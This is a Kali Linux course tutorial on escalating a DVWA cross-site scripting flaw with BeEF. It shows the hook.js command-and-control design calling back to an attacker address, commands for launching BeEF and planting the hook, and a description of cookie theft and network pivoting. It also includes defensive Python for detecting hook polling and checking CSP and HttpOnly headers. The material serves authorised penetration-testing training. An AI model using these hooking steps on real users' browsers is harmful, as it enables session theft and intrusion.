Originally published on SecurityElites (the canonical, fully-updated version of this article).
KALI LINUX COURSE
FREE
Part of the 120-Day Kali Linux Mastery Course
Day 25 of 180 · 13.8% complete
Authorised Lab Environments Only. BeEF-XSS sends command modules to hooked browsers. Every exercise in this lab targets your own DVWA instance or browsers you control. Never hook browsers you don't own. Browser exploitation without authorisation is illegal everywhere.
ZAP found the XSS on Day 24. You confirmed it with alert(1). An alert box fired. Your CVSS score said Medium. Now I want to show you what that Medium actually means when you stop accepting the pop-up and start using the right tool. A pop-up is a proof of concept. BeEF turns the same XSS into a persistent command-and-control channel into the victim's browser. Same vulnerability. Completely different impact. That's the gap between what scanners report and what pentesters demonstrate, and it's the gap Day 25 closes.
What You'll Master in Day 25

- Launch BeEF-XSS and understand the hooking architecture
- Deliver the BeEF hook script via an XSS injection point
- Run browser fingerprinting, network discovery, and social engineering modules
- Understand the BeEF + Metasploit browser_autopwn chain
- Write a professional escalated XSS finding for a pentest report
45 min read · 3 exercises · Day 25 of 120

#### Before You Start

- Day 24: OWASP ZAP - automated scanning found the XSS. Today you take that XSS finding and escalate it from an alert() pop-up to full browser control using BeEF.
- DVWA running at http://localhost/dvwa/ with security set to Low. BeEF is pre-installed in Kali; launch with beef-xss. Default credentials: beef/beef.

### Day 25 - BeEF-XSS Tutorial

1. BeEF Architecture - How the Hook Works
2. Launch BeEF and Deliver the Hook
3. Command Modules - What You Can Do to a Hooked Browser
4. Network Discovery via the Hooked Browser
5. BeEF + Metasploit - Browser Autopwn Chain
6. Reporting Escalated XSS

After Day 24's OWASP ZAP scanning surfaced the XSS findings, Day 25 is where I show you what those findings are really worth. BeEF is the tool that connects ZAP's XSS alert to an actual browser control channel, and it's the reason a stored XSS in a site with 10,000 daily users is Critical, not Medium. The full methodology is in the Kali Linux Mastery Course.
BeEF Architecture - How the Hook Works
BeEF (Browser Exploitation Framework) operates through a JavaScript hook: a single script tag that, when executed in a victim's browser, establishes a persistent connection back to your BeEF server. The victim's browser becomes a zombie: it polls BeEF every few seconds asking "any commands for me?" You respond through the BeEF web UI by selecting modules to execute.
BEEF ARCHITECTURE - QUICK REFERENCE

```text
# BeEF hook delivery - the XSS payload
hook.js loads in victim browser → calls home to BeEF C2 on port 3000

# Communication flow
Victim browser → GET /hook.js → BeEF server (attacker Kali)
Victim browser ← module commands ← BeEF web UI (attacker)
Victim browser → module results → BeEF server → attacker sees data

# What BeEF runs on
BeEF server: port 3000 - web UI + hook C2 on same port
Web UI: http://127.0.0.1:3000/ui/panel (beef/beef default)
Hook URL: http://KALI_IP:3000/hook.js
```
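Seen from the network side, the flow above leaves two traces in proxy or egress logs: a script fetch from a third-party host, then short, evenly spaced requests to that same host. The detection sketch below is an added example, not part of the original article or of BeEF. The log format, the 192.168.56.101 address, the `/poll` path and the thresholds are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev
from urllib.parse import urlsplit

# Constructed proxy log: "<ISO time> <client IP> <method> <URL>".
# 192.168.56.101 stands in for KALI_IP; "/poll" is a placeholder path,
# the detection below does not depend on it.
SAMPLE_LOG = """\
2024-05-01T10:00:00 192.168.56.1 GET http://localhost/dvwa/vulnerabilities/xss_s/
2024-05-01T10:00:00 192.168.56.7 GET http://cdn.example.com/app.js
2024-05-01T10:00:01 192.168.56.1 GET http://192.168.56.101:3000/hook.js
2024-05-01T10:00:02 192.168.56.7 GET http://cdn.example.com/style.css
2024-05-01T10:00:04 192.168.56.1 GET http://192.168.56.101:3000/poll
2024-05-01T10:00:07 192.168.56.1 GET http://192.168.56.101:3000/poll
2024-05-01T10:00:10 192.168.56.1 GET http://192.168.56.101:3000/poll
2024-05-01T10:00:13 192.168.56.1 GET http://192.168.56.101:3000/poll
2024-05-01T10:00:16 192.168.56.1 GET http://192.168.56.101:3000/poll
2024-05-01T10:00:19 192.168.56.1 GET http://192.168.56.101:3000/poll
2024-05-01T10:03:40 192.168.56.7 GET http://cdn.example.com/app.js
"""

def find_hooked_clients(log, own_hosts=("localhost",), min_gaps=5,
                        max_median_gap=10.0, max_jitter=2.0):
    """Map (client, destination) to the reasons it looks like a hooked browser."""
    hook_loads, stamps = set(), defaultdict(list)
    for line in log.strip().splitlines():
        ts, client, method, url = line.split(maxsplit=3)
        u = urlsplit(url)
        if u.hostname in own_hosts:
            continue  # first-party traffic is not a call-home channel
        key = (client, u.netloc)
        stamps[key].append(datetime.fromisoformat(ts))
        if method == "GET" and u.path.endswith("/hook.js"):
            hook_loads.add(key)  # weak signal on its own: a file name
    findings = {}
    for key, times in stamps.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Polling "every few seconds": many short, evenly spaced requests.
        beacon = (len(gaps) >= min_gaps and median(gaps) <= max_median_gap
                  and pstdev(gaps) <= max_jitter)
        reasons = [name for name, hit in (("hook.js load", key in hook_loads),
                                          ("regular polling", beacon)) if hit]
        if reasons:
            findings[key] = reasons
    return findings
```

The interval check is the stronger of the two signals, because it keys on the polling behaviour rather than on a file name.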
[Figure: BeEF web UI, hooked browser control panel. Left panel: Hooked Browsers. Right panel: Command Modules (Get Cookie, Fingerprint, Network Discovery, Fake Update, Metasploit Browser Exp).]
BeEF web UI showing a hooked browser. The left panel lists all connected (online) browsers, each one a victim whose browser loaded the hook.js. The right panel shows command module results: Get Cookie has returned the PHPSESSID session token, browser fingerprinting is complete, network discovery is running. From this single XSS injection, I now have the session cookie that grants admin access, the full browser/OS profile for exploit targeting, and a pivot point into the victim's internal network. This is why stored XSS on an authenticated page is Critical, not Medium.
Launch BeEF and Deliver the Hook

LAUNCHING BEEF AND DELIVERING THE HOOK

```bash
# Launch BeEF (Kali pre-installed)
sudo beef-xss
# Or: sudo /usr/share/beef-xss/beef
# Output shows: Web UI at http://127.0.0.1:3000/ui/panel
#               Hook URL: http://YOUR_KALI_IP:3000/hook.js

# Get your Kali IP (use this in the hook payload)
hostname -I | awk '{print $1}'

# Hook delivery via stored XSS in DVWA (XSS Stored module)
# Navigate to: http://localhost/dvwa/vulnerabilities/xss_s/
# Name field: anything
# Message field: your hook script
# Submit -> hook loads when anyone visits the guestbook page

# Hook delivery via reflected XSS (URL parameter)
# http://localhost/dvwa/vulnerabilities/xss_r/?name=

# Verify hook in BeEF UI
# Open browser -> http://127.0.0.1:3000/ui/panel -> beef/beef
# Left panel: "Hooked Browsers" should show new entry within 3s
```
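On the application side, two response headers decide whether the hook delivery above works and whether a Get Cookie module can return the session token: a Content-Security-Policy that restricts script origins, and the HttpOnly cookie attribute. This added example (not from the original article) checks both with a simplified CSP host-source matcher; the header values and the 192.168.56.101 address are constructed.

```python
from urllib.parse import urlsplit

PORTS = {"http": 80, "https": 443}

def origin(url):
    u = urlsplit(url)
    return u.scheme, u.hostname, u.port or PORTS.get(u.scheme)

def host_source_matches(src, scheme, host, port):
    # Simplified CSP host-source: [scheme://]host[:port], with "*." wildcards.
    src_scheme, _, rest = src.rpartition("://")
    src_host, has_port, src_port = rest.split("/")[0].partition(":")
    host_ok = host.endswith(src_host[1:]) if src_host.startswith("*.") else src_host == host
    if not host_ok or (src_scheme and src_scheme != scheme):
        return False
    if not has_port:  # no port in the source: only the scheme's default port
        return port == PORTS.get(scheme)
    return src_port in ("*", str(port))

def csp_allows_script(csp, page_url, script_url):
    directives = {}
    for part in csp.lower().split(";"):
        tokens = part.split()
        if tokens:
            directives.setdefault(tokens[0], tokens[1:])
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True  # no directive restricts where scripts load from
    target = origin(script_url)
    for src in sources:
        if src == "'self'":
            if origin(page_url) == target:
                return True
        elif src in ("*", target[0] + ":"):
            return True
        elif not src.startswith("'") and host_source_matches(src, *target):
            return True
    return False

def cookie_readable_by_script(set_cookie):
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "httponly" not in attrs

# Constructed sample values; 192.168.56.101 stands in for KALI_IP.
PAGE = "http://localhost/dvwa/vulnerabilities/xss_s/"
HOOK = "http://192.168.56.101:3000/hook.js"
WEAK = {"Set-Cookie": "PHPSESSID=abc123; path=/"}
HARDENED = {"Set-Cookie": "PHPSESSID=abc123; path=/; HttpOnly",
            "Content-Security-Policy": "script-src 'self'"}
```

Both headers limit what an injected script can reach; the injection point itself still has to be fixed with output encoding.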
EXERCISE 1 - THINK LIKE A HACKER (15 MIN · NO TOOLS)
Design a BeEF Attack Chain - From XSS to Maximum Impact
15 minutes · No tools required
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
